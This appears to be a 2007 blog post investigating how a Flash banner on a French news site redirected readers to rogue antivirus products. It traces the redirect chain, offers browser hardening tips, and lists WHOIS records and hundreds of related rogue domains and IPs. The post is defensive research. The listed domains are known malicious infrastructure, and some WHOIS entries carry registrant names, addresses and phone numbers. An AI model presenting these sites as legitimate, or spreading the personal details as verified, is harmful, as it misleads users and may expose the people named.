Recently many people got redirected to rogue products such as ErrorSafe, Malware-Scan, PerformanceOptimizer, Erreur Chasseur for French people as they are geo location based. I got myself hit by such advertisements in my Virtual Machine while surfing on legitimate and serious websites.

References to read

Content of http://www.bluetack.co.uk/forums/index.php?showtopic=18044

Malicious advertisements and advertising fraud.
http://msmvps.com/blogs/spywaresucks/archi...08/1386804.aspx

Il mistero (svelato) della redirezione su ToolSicuro
http://www.suspectfile.com/wblog/?p=41

Translated version of ToolSicuro using Google:
http://translate.google.com/translate?u=ht...en&ie=UTF-8

Rogue ads pushing malware -- how it works
http://sunbeltblog.blogspot.com/2007/11/ro...d-networks.html

Mike On Ads - ErrorSafe
http://www.mikeonads.com/what-is-errorsafe...-do-we-stop-it/

The article from SuspectFile explains the mechanism very well so there isn't much to add. Most people of the spyware community got intrigued, myself included. Below is a small summary of the investigation I started yesterday but the main purpose of this article will be:

Can I protect myself from these adverts?

Ready for a flashy ride? Ok let's take off ...

Unless you know what you're doing or have a VM handy, don't play with this please.

Step 1 - Getting infected again

Since I know where I got the malicious swf file, it didn't take much time to get infected again. I was simply reading the news on a French website. So fasten your seat belts and let's surf over there again but this time with Ethereal running since we must trace the connections. Take off to Le Nouvel Observateur. Since adverts are rotating, it might take a couple of minutes to get the swf file, so let’s follow a few links on the main page. It took only a few mouse clicks to obtain the desired result. In the middle of reading a chapter, my Internet Browser sort of “vanished” and PerformanceOptimizer was all there was left on my desktop.

Clicking Ok or Cancel doesn't really matter ...
BTW, nice imitation of My Computer ... those guys are really inventive.

Back, Next, Cancel .... your choice. All roads lead to Rome.

Let's move on to the next part.

Step 2 - Tracking the advert

This part is time consuming as it does involve quite some reading. The firewall log may permit to narrow down – in other words spotting the link that is responsible for the infection.
I knew had to search after newbieadguide(dot)com and performanceoptimizer(dot)com but that wasn’t enough to understand everything.
The Ethereal log shows an interesting detail called Referer.


Looks like we have found our culprit.

Step 3 - Trying to assemble the puzzle

File: textbookx_728x90.swf shows 100% clean at Virustotal.

Below are 2 screenshots of the swf file showing a part of its code using 2 different programs.

It has some encrypted? obfuscated? action scripts in it, way beyond my skills to decode that. Looks like SWF Encrypt was used to obfuscate the code.
You’ll find some details on it’s content and how it triggers in the write-up made by SuspectFile.

See the mention Protected & Encrypted.

Next “links in the chain” are the following web sites token from the firewall log:


Note: Read up from bottom to top for chronological order.

I will not detail those elements; only post them for historical purposes. If you really feel bored, you can always take a peek at the code of the php pages.

newbieadguide.com/statsa.php
Click to view attachment

newbieadguide.com/statsg.php
Click to view attachment

"Chameleon" in gnida.swf (Refered by SuspectFile).

Action script from gnida.swf
Click to view attachment

Tools used

Flash Decompiler Trillix
http://www.decompiler-swf.com

Sothink SWF Decompiler
http://www.sothink.com/product/flashdecompiler/

Flare
http://www.nowrap.de/flare.html

SWF Encrypt™ 4.0
http://www.amayeta.com/

Ethereal
http://www.ethereal.com

Can I protect myself from these adverts?

Hundreds of domains are “serving” this crap. So what's the miracle solution? I’m sorry I can’t offer the perfect way of handling this. I can simply suggest a few mesures.

The HOSTS file

You won’t get redirected to any of the sites included in the file. Thus by adding newbieadguide.com and all the other "known" domains, you still will be able to see the initial flash advert but you won't get redirected to the rogue site.
Con of this approach are the "unknown" domains. New domains are probably ready to serve the same redirects and before they are spotted, many innocent people will be hit over and over again. But it does help a little bit.

Firewall

If you have a firewall with ad blocking capacities, activate them. Most of them block banners if they meet some conditions based upon size, keywords, etc … It isn’t perfect but it surely helps.

Manage Add-ons in Internet Explorer

Open up Internet Explorer and select Tools > Manage Add-ons.
Depending on your Internet version, the options might vary a bit. Either look under Add-ons currently loaded in Internet Explorer or under Add-ons that have been used by Internet Explorer. IE7 has an additional option too.

Select the Shockwave Flash Object and set its status to disabled. Ok the boxes and restart Internet Explorer as required.

Internet Explorer add-ons: frequently asked questions
http://windowshelp.microsoft.com/Windows/e...df9b7e1033.mspx

How to Configure Enhanced Security Features for Internet Explorer from Windows XP SP2
http://www.microsoft.com/technet/security/...xp/iesecxp.mspx

How to manage Internet Explorer add-ons in Windows XP Service Pack 2
http://support.microsoft.com/kb/883256

NoScript for Firefox

Install NoScript for Firefox if not yet done.
Right click the icon in the status bar and select Options.

Put a checkmark next to Forbid Macromedia Flash. I would recommend checking Apply these restrictions to trusted sites to. If you only have a few trusted sites then you might leave that unchecked. Everything depends on your other settings.

More information can be found at the Noscript website

While you are installing plugins and securing Firefox, you might also add AdblockPlus on your ToDo list.

Setting the "killbit" for Flash

If you don’t want to mess around with the Internet Explorer Add-ons or Noscript, you can always set the killbit for Shockwave.

You can perform this task in various ways:

• By creating a registry fix.
  See : How to stop an ActiveX control from running in Internet Explorer.
• FlashKill
• Other Free Tools to deal with this.
• Using Spyware Blaster
  
  

Of course with the last 3 methods you won’t be able to see Flash animations no matter what webpage you visit. But that’s a very small price to stay protected imo.

Uninstall Flash

How to uninstall the Adobe Flash Player plug-in and ActiveX control

Other Flash related links:

• How to manage and disable Local Shared Objects
• Flash Player security and privacy

Now it's up to you all. Happy surf.

On 17 December I received a positive response from the Nouvel Observateur, the banner was removed from the website.

Several banners are still active and present on internet, so webmasters take your responsibilities and take them down please. In doubt get them analysed and contribute to keep internet clean & safe.

As mentionned above, people are redirected based upon their geo location. The list below reflects the main domains and their "associated" IP's / domains. The redirects I did stumble on during tests are listed in red (main domains not included).
The list is still a work in progress and I'll keep it updated as much as possible.

Main domains

newbieadguide.com - 217.150.254.40

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag
Dedicated Hosting: newbieadguide.com is hosted on a dedicated server.

Record last updated on 24-Apr-2007.
Record expires on 20-Apr-2008.
Record created on 20-Apr-2007.

Domain servers in listed order:
NS2.NEWBIEADGUIDE.COM 190.15.73.252
NS1.NEWBIEADGUIDE.COM 190.15.73.251
______________________________

vozemiliogaranon.com - 217.150.254.41

Server Type: Apache
IP Location - Switzerland - Pc Ions Incorporation

Domain Name : vozemiliogaranon.com

::Registrant::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Administrative Contact::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Technical Contact::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Name Servers::
ns1.vozemiliogaranon.com
ns2.vozemiliogaranon.com
ns3.vozemiliogaranon.com
ns4.vozemiliogaranon.com

::Dates & Status::
Created Date 2007-11-23 04:58:49 EST
Updated Date 2007-11-23 04:58:49 EST
Valid Date 2008-11-23 04:58:49 EST
Status ACTIVE
______________________________

thetechnorati.com - 217.150.254.44

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-07
Domain Name : thetechnorati.com

::Registrant::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Administrative Contact::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Technical Contact::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Name Servers::
ns1.thetechnorati.com
ns2.thetechnorati.com
ns3.thetechnorati.com
ns4.thetechnorati.com

::Dates & Status::
Created Date 2007-11-23 05:13:25 EST
Updated Date 2007-11-23 05:13:25 EST
Valid Date 2008-11-23 05:13:25 EST
Status ACTIVE
______________________________

akamahi.net - 217.150.254.45

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-23
Domain Name : akamahi.net

::Registrant::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Administrative Contact::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Technical Contact::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Name Servers::
ns1.akamahi.net
ns2.akamahi.net
ns3.akamahi.net
ns4.akamahi.net

::Dates & Status::
Created Date 2007-11-23 05:18:08 EST
Updated Date 2007-11-23 05:18:08 EST
Valid Date 2008-11-23 05:18:08 EST
Status ACTIVE
______________________________

adtraff.com - 84.243.252.84

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: adtraff.com is hosted on a dedicated server.

Record last updated on 02-Nov-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.

Domain servers in listed order:
NS1.ADTRAFF.COM 190.15.73.251
NS2.ADTRAFF.COM 190.15.73.252
______________________________

burnads.com - 84.243.252.85

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: burnads.com is hosted on a dedicated server.

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-11
Domain Name : burnads.com

::Registrant::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Administrative Contact::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Technical Contact::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Name Servers::
ns1.burnads.com
ns2.burnads.com

::Dates & Status::
Created Date 2006-06-29 05:33:08 EDT
Updated Date 2007-06-27 17:54:41 EDT
Valid Date 2008-06-29 05:33:08 EDT
Status ACTIVE
______________________________

mysurvey4u.com - uniqads.com - traffalo.com - traveltray.com - 190.15.73.254

Server Type: lighttpd/1.4.13
IP Location - Francisco Morazan - Tegucigalpa - Secure Hosting Ltd
Reverse IP: 107 other sites hosted on this server.


mysurvey4u.com

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-14
Domain Name : mysurvey4u.com

::Registrant::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Administrative Contact::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Technical Contact::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Name Servers::
ns1.mysurvey4u.com
ns2.mysurvey4u.com

::Dates & Status::
Created Date 2006-12-04 09:57:28 EST
Updated Date 2007-12-03 20:06:35 EST
Valid Date 2008-12-04 09:57:28 EST
Status ACTIVE


uniqads.com

Record last updated on 08-Jun-2007.
Record expires on 27-Apr-2008.
Record created on 27-Apr-2007.

Domain servers in listed order:
NS2.UNIQADS.COM 190.15.73.252
NS1.UNIQADS.COM 190.15.73.251


traffalo.com

Record last updated on 26-Apr-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.

Domain servers in listed order:
NS1.TRAFFALO.COM 190.15.73.251
NS2.TRAFFALO.COM 190.15.73.252


traveltray.com

Record last updated on 02-Jun-2007.
Record expires on 01-Jul-2008.
Record created on 01-Jul-2004.

Domain servers in listed order:
NS1.TRAVELTRAY.COM 190.15.73.251
NS2.TRAVELTRAY.COM 190.15.73.252

Closest Relationships

newbieadguide.com

domains sharing mailservers

• ad2cash.net
• adtraff.com
• bucksbill.com
• burnads.com
• cryptdrive.com
• deuscleanerpay.com
• errordigger.com
• errorinspector.com
• fileprotector.com
• forceup.com
• freetvnow.net
• netmediagroup.net
• netturbopro.com
• opensols.com
• popupnukerpro.com
• sellmoresoft.net
• sellmysoft.net
• traffalo.com
• unicsearch.com
• uniqads.com
• windefender.com
• zappinads.com

domains sharing nameservers

• ad2cash.net
• adcomatoz.com
• adtraff.com
• b2adz.com
• blessedads.com
• bucksbill.com
• burnads.com
• cryptdrive.com
• fileprotector.com
• forceup.com
• freetvnow.net
• megashopcity.com
• mysurvey4u.com
• netmediagroup.net
• netturbopro.com
• popadprovider.com
• popupnukerpro.com
• prevedmarketing.com
• r2d2adverising.com
• sellmoresoft.net
• sellmysoft.net
• shivanetworking.com
• traffalo.com
• traveltray.com
• unicsearch.com
• uniqads.com
• upg-soft.net
• windefender.com
• yourshopz.com
• zappinads.com

subdomains

• mail.newbieadguide.com
• ns1.newbieadguide.com
• ns2.newbieadguide.com
• www newbieadguide.com

______________________________

vozemiliogaranon.com

domains sharing nameservers

• advancedcleaner.com
• akamahi.net
• antispywaresuite.com
• antiviruspcsuite.com
• bestsellerantivirus.com
• diskretter.com
• elmejorantivirus.com
• erreurchasseur.com
• exterminadordevirus.com
• moncontenuassistant.com
• schijfbewaker.com
• securepccleaner.com
• spyguardpro.com
• storageprotector.com
• systemdoctor.com
• thetechnorati.com
• toolsicuro.com

subdomains

• ns1.vozemiliogaranon.com
• ns2.vozemiliogaranon.com
• ns3.vozemiliogaranon.com
• ns4.vozemiliogaranon.com

______________________________

thetechnorati.com

domains sharing nameservers

• advancedcleaner.com
• antispywaresuite.com
• antiviruspcsuite.com
• bestsellerantivirus.com
• diskretter.com
• elmejorantivirus.com
• erreurchasseur.com
• exterminadordevirus.com
• moncontenuassistant.com
• schijfbewaker.com
• securepccleaner.com
• spyguardpro.com
• storageprotector.com
• systemdoctor.com
• toolsicuro.com
• vozemiliogaranon.com

subdomains

• ns1.thetechnorati.com
• ns2.thetechnorati.com
• ns3.thetechnorati.com
• ns4.thetechnorati.com

______________________________

akamahi.net

domains sharing nameservers

• advancedcleaner.com
• antispywaresuite.com
• antiviruspcsuite.com
• bestsellerantivirus.com
• diskretter.com
• elmejorantivirus.com
• erreurchasseur.com
• exterminadordevirus.com
• moncontenuassistant.com
• schijfbewaker.com
• securepccleaner.com
• spyguardpro.com
• storageprotector.com
• systemdoctor.com
• thetechnorati.com
• toolsicuro.com
• vozemiliogaranon.com

subdomains

• ns1.akamahi.net
• ns2.akamahi.net
• ns3.akamahi.net
• ns4.akamahi.net

______________________________

mysurvey4u.com

hostnames sharing ip with a-records

• ns1.1downlinebuilder.info
• ns2.1downlinebuilder.info

domains sharing mailservers

• advancedcleaner.com
• boysmag.net
• crazycinema.net
• gaychoice.net
• globalsoftcash.net
• iseekporn.net
• traveltray.com
• videosexygirls.net
• viragehosting.com

domains using this as nameserver

• 1downlinebuilder.info

domains sharing nameservers

• ad2cash.net
• adcomatoz.com
• adtraff.com
• b2adz.com
• blessedads.com
• bucksbill.com
• burnads.com
• cryptdrive.com
• fileprotector.com
• forceup.com
• freetvnow.net
• megashopcity.com
• netmediagroup.net
• netturbopro.com
• newbieadguide.com
• popadprovider.com
• popupnukerpro.com
• prevedmarketing.com
• r2d2adverising.com
• sellmoresoft.net
• sellmysoft.net
• shivanetworking.com
• traffalo.com
• traveltray.com
• unicsearch.com
• uniqads.com
• upg-soft.net
• windefender.com
• yourshopz.com
• zappinads.com

______________________________

traveltray.com

hostnames sharing ip with a-records

• ns2.1easy-breezy.info

domains sharing mailservers

• advancedcleaner.com
• boysmag.net
• crazycinema.net
• gaychoice.net
• globalsoftcash.net
• iseekporn.net
• mysurvey4u.com
• videosexygirls.net
• viragehosting.com

domains using this as nameserver

• 1easy-breezy.info

domains sharing nameservers

• ad2cash.net
• adcomatoz.com
• adtraff.com
• b2adz.com
• blessedads.com
• bucksbill.com
• burnads.com
• cryptdrive.com
• fileprotector.com
• forceup.com
• freetvnow.net
• megashopcity.com
• mysurvey4u.com
• netmediagroup.net
• netturbopro.com
• newbieadguide.com
• popadprovider.com
• popupnukerpro.com
• prevedmarketing.com
• r2d2adverising.com
• sellmoresoft.net
• sellmysoft.net
• shivanetworking.com
• traffalo.com
• unicsearch.com
• uniqads.com
• upg-soft.net
• windefender.com
• yourshopz.com
• zappinads.com

______________________________

uniqads.com - traffalo.com - burnads.com

domains sharing mailservers

• ad2cash.net
• adtraff.com
• bucksbill.com
• burnads.com
• cryptdrive.com
• deuscleanerpay.com
• errordigger.com
• errorinspector.com
• fileprotector.com
• forceup.com
• freetvnow.net
• netmediagroup.net
• netturbopro.com
• newbieadguide.com
• opensols.com
• popupnukerpro.com
• sellmoresoft.net
• sellmysoft.net
• traffalo.com
• unicsearch.com
• windefender.com
• zappinads.com

domains sharing nameservers

• ad2cash.net
• adcomatoz.com
• adtraff.com
• b2adz.com
• blessedads.com
• bucksbill.com
• burnads.com
• cryptdrive.com
• fileprotector.com
• forceup.com
• freetvnow.net
• megashopcity.com
• mysurvey4u.com
• netmediagroup.net
• netturbopro.com
• newbieadguide.com
• popadprovider.com
• popupnukerpro.com
• prevedmarketing.com
• r2d2adverising.com
• sellmoresoft.net
• sellmysoft.net
• shivanetworking.com
• traffalo.com
• traveltray.com
• unicsearch.com
• upg-soft.net
• windefender.com
• yourshopz.com
• zappinads.com

190.15.73.254

1. Ad2cash.net
2. Ad2profit.com
3. Adcomatoz.com
4. Adgurman.com
5. Adhokuspokus.com
6. Adnetserver.com
7. Adredired.com
8. Adsolutio.com
9. Adverdaemon.com
10. Adverlounge.com
11. Adzyclon.com
12. Antivirussecuritypro.com
13. Astalaprofit.com
14. B2adz.com
15. Bestadmedia.com
16. Bestpharmacydeals.com
17. Bestsearchnet.com
18. Bestshopz.com
19. Bestwnvmovies.com
20. Bizadverts.com
21. Bizmarketads.com
22. Blessedads.com
23. Brandmarketads.com
24. Bucksinsoft.com
25. Cancerno.com
26. Cashloanprofit.com
27. Casinoaceking.com
28. Casinodealsgalore.com
29. Cheap-auto-deals.com
30. Co-search.com
31. Deuscleanerpay.com
32. Easybestdeals.com
33. Eroticabsolute.com
34. Fantazybill.com
35. Favouriteshop.com
36. Fileprotector.com
37. Freepcsecure.com
38. Freetvnow.net
39. Friedads.com
40. Getfreecar.com
41. Glorymarkets.com
42. Great4mac.com
43. Greyhathosting.com
44. Hebooks-service.com
45. Iddqdmarketing.com
46. Infyte.com
47. Installprovider.com
48. Internetadaultfriend.com
49. Intervarioclick.com
50. Invulnerableads.com
51. Keywordcpv.com
52. Libresystm.com
53. Luckyadcoin.com
54. Luckyadsols.com
55. Magicsearcher.com
56. Manage-search.com
57. Marketingdungeon.com
58. Mediatornado.com
59. Megashopcity.com
60. Mightyfaq.com
61. Misc-search.com
62. Mobilesoftmarketing.com
63. Moneycometrue.com
64. Moneypalacecash.com
65. Myfavouritesearch.com
66. Myhealth-life.org
67. Myonlinefinance.com
68. Mysurvey4u.com
69. Mythmarketing.com
70. Mytravelgeek.com
71. Netturbopro.com
72. Onestopshopz.com
73. Opensols.com
74. Pcsoftw.com
75. Pcsupercharger.com
76. Popadprovider.com
77. Popsmedia.com
78. Popupnukerpro.com
79. Prenetsearch.com
80. Prevedmarketing.com
81. Prizesforyou.com
82. R2d2adverising.com
83. Rocktheads.com
84. Roller-search.com
85. Rombic-search.com
86. Searchcolours.com
87. Sellmoresoft.com
88. Selvascreensaver.com
89. Sharpadverts.com
90. Shivanetworking.com
91. Shopshot.com
92. Softwcs.com
93. Stratosearch.com
94. Swiftcleaner.com
95. Tallgrass-seach.com
96. Traffalo.com
97. Traveltray.com
98. Uniqads.com
99. Vitecmedia.com
100. Waytotheprofit.com
101. Windefender.com
102. Wontu-search.com
103. Workhomecenter.com
104. Yourseeker.com
105. Yourshopz.com
106. Yourteacheronline.com
107. Zappinads.com
108. Zooworld-search.com

84.243.253.220

1. Anonymbrowser.com
2. Blablahost.com
3. Errordigger.com
4. Errorinspector.com
5. Passwordinspector.com
6. Performanceoptimizer.com
7. Sellmosoft.net
8. Internetsupernanny.com

77.91.229.103

1. Malware-scan.com
2. Xmalware-scan.com

77.91.229.104

1. scanner2.malware-scan.com

67.55.81.200

1. Accelerateurmaligne.com
2. Aceleradorlisto.com
3. Addioerrori.com
4. Adremversneller.com
5. Anonymwinpc.com
6. Antimalwareshield.com
7. Antispywarecontrole.com
8. Antispywarecontrollo.com
9. Antispywarekontrolle.com
10. Antispywareseigyo.com
11. Antivirusgereedschap.com
12. Antivirusscherm.com
13. Antivirussolusjon.com
14. Aucunsvirus.com
15. Avsystemcare.com
16. Bedsteantivirus.com
17. Bereiniger.com
18. Cleverspeeder.com
19. Controlantiespia.com
20. Defectshuri.com
21. Doraibuhogo.com
22. Easysprinter.com
23. Echterschutz.com
24. Effaceurvirus.com
25. Elevarendimiento.com
26. Enkelsprinter.com
27. Errclean.com
28. Erreurchasseur.com
29. Fiksfeil.com
30. Fixmenaces.com
31. Handigebeheerder.com
32. Harddrevvagt.com
33. Hataduzelticisi.com
34. Herramientadereparacion.com
35. Hukommelsesbeskytter.com
36. Hulpprogramma.com
37. Kansennashi.com
38. Kantansprinter.com
39. Keinespuren.com
40. Keinestoerungen.com
41. Klogspeeder.com
42. Klugerspeeder.com
43. Kontentsueraser.com
44. Kvikkpc.com
45. Kyoishusei.com
46. Leichtersprinter.com
47. Lettsprinter.com
48. Liberapc.com
49. Lifelongpc.com
50. Maskinpcpro.com
51. Megaviruskit.com
52. Megliopc.com
53. Melhorpc.com
54. Memoiredefenseur.com
55. Mendingtool.com
56. Minnesverktyg.com
57. Moncontenuassistant.com
58. Msahihalakhtaa.com
59. Nemsprinter.com
60. Nettoyagevirus.com
61. Nientevirus.com
62. Nochanceforvirus.com
63. Noespias.com
64. Nulinfektioner.com
65. Ottimizzaveloce.com
66. Pasokoneiju.com
67. Pcforbedring.com
68. Pclyftare.com
69. Pcohneviren.com
70. Pcoppdrettere.com
71. Pcopschoner.com
72. Pcopschoningsstel.com
73. Pcraiser.com
74. Pcreveil.com
75. Pcsamensteller.com
76. Pcscattista.com
77. Pcschirmer.com
78. Pcverdediger.com
79. Performancekoujou.com
80. Privacidadplus.com
81. Protectioncomplete.com
82. Puliscitutto.com
83. Pulitasystem.com
84. Rendator.com
85. Rensningverktyg.com
86. Reparameacas.com
87. Reparamenazas.com
88. Reparetudo.com
89. Scattofacile.com
90. Shufukutsuru.com
91. Sicheressystem.com
92. Sininfecciones.com
93. Smartkasoku.com
94. Smartokare.com
95. Sprinterfacile.com
96. Sprinterpc.com
97. Sysdepannage.com
98. Syskontroller.com
99. Systemfreigabe.com
100. Systemreiniging.com
101. Tabortvirus.com
102. Temizsurucu.com
103. Utiledeprotection.com
104. Varrevirus.com
105. Velocidadsimple.com
106. Vigilamenazas.com
107. Virenloescher.com
108. Virenstopper.com
109. Virtual-leatherman.com
110. Virusfjernere.com
111. Virusudryddet.com
112. Winadsiz.com
113. Winanonyme.com
114. Winanonymitet.com
115. Winanzen.com
116. Winbescherming.com
117. Windefensa.com
118. Windifesavirale.com
119. Winhogo.com
120. Winkujoenjin.com
121. Winpcalmeglio.com
122. Winpcdocteur.com
123. Winpcdoktor.com
124. Winpckontroll.com
125. Winpcrensare.com
126. Winpcrensere.com
127. Winriservatezza.com
128. Winsecurite.com
129. Winsikkerantivirus.com
130. Winsikretav.com
131. Winsurffilter.com
132. Wintemizleyicisi.com
133. Wintrygghet.com
134. Wirusumuryokuka.com
135. Yoursystemguard.com

87.117.252.11

1. Acchiappavirus.com
2. Adiosvirus.com
3. Ahorrememoria.com
4. Altalimpeza.com
5. Anonimutente.com
6. Antiamenazas.com
7. Antiespiamaestro.com
8. Antievidence.com
9. Antispionimaestro.com
10. Antispywareconductor.com
11. Antispywarecontrol.com
12. Antispywaremaster.com
13. Antispywaremeister.com
14. Antispywaresuite.com
15. Antivirusfiable.com
16. Antivirusforall.com
17. Antivirusforalla.com
18. Antivirusforalle.com
19. Antivirusfueralle.com
20. Antivirusgenial.com
21. Antivirusmagique.com
22. Antivirusparatodos.com
23. Antiviruspcsuite.com
24. Anzentsuru.com
25. Apagahistorico.com
26. Apolloantivirus.com
27. Archivosenestado.com
28. Atemaiserro.com
29. Atrapavirus.com
30. Aucunchoixpourvirus.com
31. Aucunefaute.com
32. Aucuninfection.com
33. Aucunmenace.com
34. Aucunserreurs.com
35. Avcompleto.com
36. Avsecurityplus.com
37. Avseguro.com
38. Bandoaivirus.com
39. Bandoalleinfezioni.com
40. Barreraintegral.com
41. Bastioneantivirus.com
42. Beschermingstool.com
43. Beskyttelseonline.com
44. Beskyttendevaerktoj.com
45. Bestsellerantivirus.com
46. Blanchdisc.com
47. Borresuspasos.com
48. Bossedeserreurs.com
49. Brossedesfautes.com
50. Bugseraser.com
51. Caiforavirus.com
52. Ceroamenazas.com
53. Cerovirus.com
54. Chasseurdeserreures.com
55. Cleanerpotente.com
56. Cleanpctool.com
57. Cleanuptool.com
58. Confidentsurf.com
59. Confidentuser.com
60. Contenidoseguros.com
61. Contenteraser.com
62. Controledemenaces.com
63. Controlloreprivacy.com
64. Curerrores.com
65. Dataconfidentiality.com
66. Defensaantivirus.com
67. Defensecelebre.com
68. Defensededriver.com
69. Defensedinformation.com
70. Defensedudisque.com
71. Defensenetsurfage.com
72. Defensivesystem.com
73. Dejitarufukugen.com
74. Dejitarukyoikira.com
75. Dejitaruwakuchin.com
76. Detapurotekuta.com
77. Detaripea.com
78. Detectaerrores.com
79. Discoseguro.com
80. Diskassistent.com
81. Diskretter.com
82. Disksaeuberung.com
83. Disksizesaver.com
84. Disksparare.com
85. Disukushuri.com
86. Doubledefender.com
87. Driversecurise.com
88. Einwandfreierpc.com
89. Eliminadordeamenazas.com
90. Elmejorantivirus.com
91. Emperahogo.com
92. Enmiendaerrores.com
93. Equipoantiespia.com
94. Eracheisa.com
95. Erasutoppu.com
96. Errorfighter.com
97. Essentialeraser.com
98. Expertdantispyware.com
99. Exterminadordevirus.com
100. Extremuclean.com
101. Fairukyua.com
102. Fehlerbeseitiger.com
103. Feilvakt.com
104. Fejlfripc.com
105. Fejlreparering.com
106. Felfixare.com
107. Ferramentadesolucao.com
108. Ferramentasegura.com
109. Festplattencleaner.com
110. Festplattenreiniger.com
111. Festplattentool.com
112. Fiksdinpc.com
113. Filtredetraces.com
114. Filtrototal.com
115. Fixthemnow.com
116. Fjernervirus.com
117. Foutenwacht.com
118. Geheugenredder.com
119. Guardiandelaprivacidad.com
120. Guardianodelpc.com
121. Gubbishremover.com
122. Hackerstaisaku.com
123. Hadodoraibugado.com
124. Harddriveguard.com
125. Herramientasegura.com
126. Historialout.com
127. Hotbevakning.com
128. Ingavirus.com
129. Ingenmulighetforvirus.com
130. Inhaltsaeuberung.com
131. Inhaltspeicher.com
132. Inmunepc.com
133. Kakujitsutsuru.com
134. Keinespurenlassen.com
135. Keineviren.com
136. Knowhowprotection.com
137. Konsekiauto.com
138. Kontentsufiruta.com
139. Kurinkonseki.com
140. Kyoiireza.com
141. Kyoikanshi.com
142. Kyoryokucleaner.com
143. Largavidapc.com
144. Laufwerkcleaner.com
145. Libresystem.com
146. Limpiapc.com
147. Limpietodo.com
148. Lomejorenantivirus.com
149. Longlifepc.com
150. Lungavitapc.com
151. Maechtigerreiniger.com
152. Malwareschutz.com
153. Manutencaopc.com
154. Memorisebu.com
155. Menacecontrole.com
156. Menacefighter.com
157. Menacemonitor.com
158. Menacescrubber.com
159. Menacesprotection.com
160. Miavcompleto.com
161. Mightycleaner.com
162. Minnesparere.com
163. Monitordeamenazas.com
164. Moteurpcpro.com
165. Mycontentassistant.com
166. Netsurfageassure.com
167. Nettoyeurdepc.com
168. Nettoyeurdeserreures.com
169. Nettoyeurdevirus.com
170. Nettoyeurpuissant.com
171. Neuerantivirus.com
172. Neuerschild.com
173. Nientetracce.com
174. Nouvelantivirus.com
175. Nurdeinpc.com
176. Ohnespurensurfen.com
177. Omelhorantivirus.com
178. Onlinehelpmate.com
179. Onlineverktyg.com
180. Onrainpurotekuta.com
181. Ordureffaceur.com
182. Oruripea.com
183. Pasderreurs.com
184. Pasdesfautes.com
185. Pasdesmenaces.com
186. Pasendommagement.com
187. Pasplusdespertes.com
188. Pasplusdevirus.com
189. Pcantiviruspro.com
190. Pcassertor.com
191. Pcbewaker.com
192. Pcboosterpro.com
193. Pcbunan.com
194. Pceternel.com
195. Pcforfender.com
196. Pchealthkeeper.com
197. Pchjaelper.com
198. Pcinforedder.com
199. Pclibredevirus.com
200. Pcohnespuren.com
201. Pcprivacytool.com
202. Pcredskab.com
203. Pcsansbug.com
204. Pcsecuresystem.com
205. Pcsecurise.com
206. Pcsentineru.com
207. Pcsiemprenueva.com
208. Pctoolpro.com
209. Pcultralimpia.com
210. Pcveiligheidstool.com
211. Pcvirussweeper.com
212. Perfektantivirus.com
213. Personalityprotector.com
214. Poseidonantivirus.com
215. Poupememoria.com
216. Preservingtool.com
217. Privacidadconductor.com
218. Privacidadgarantizada.com
219. Privacidadyseguridad.com
220. Privacyconductor.com
221. Privacyredder.com
222. Privacywaker.com
223. Privacywarrior.com
224. Privatsicherer.com
225. Protecaoconfiavel.com
226. Proteccionasegurada.com
227. Proteccioncompleta.com
228. Proteccionimperial.com
229. Protecteurdinfo.com
230. Protectionassuree.com
231. Protectionconue.com
232. Protectiondedriver.com
233. Protectiondenetsurfage.com
234. Proteggidati.com
235. Protezioneesperta.com
236. Protezionefidata.com
237. Pulituraestrema.com
238. Puraibashihosho.com
239. Puraibashimaneja.com
240. Puraibashitoshinrai.com
241. Rendimientototal.com
242. Rensanu.com
243. Reparaerrores.com
244. Reparateurdesysteme.com
245. Repareja.com
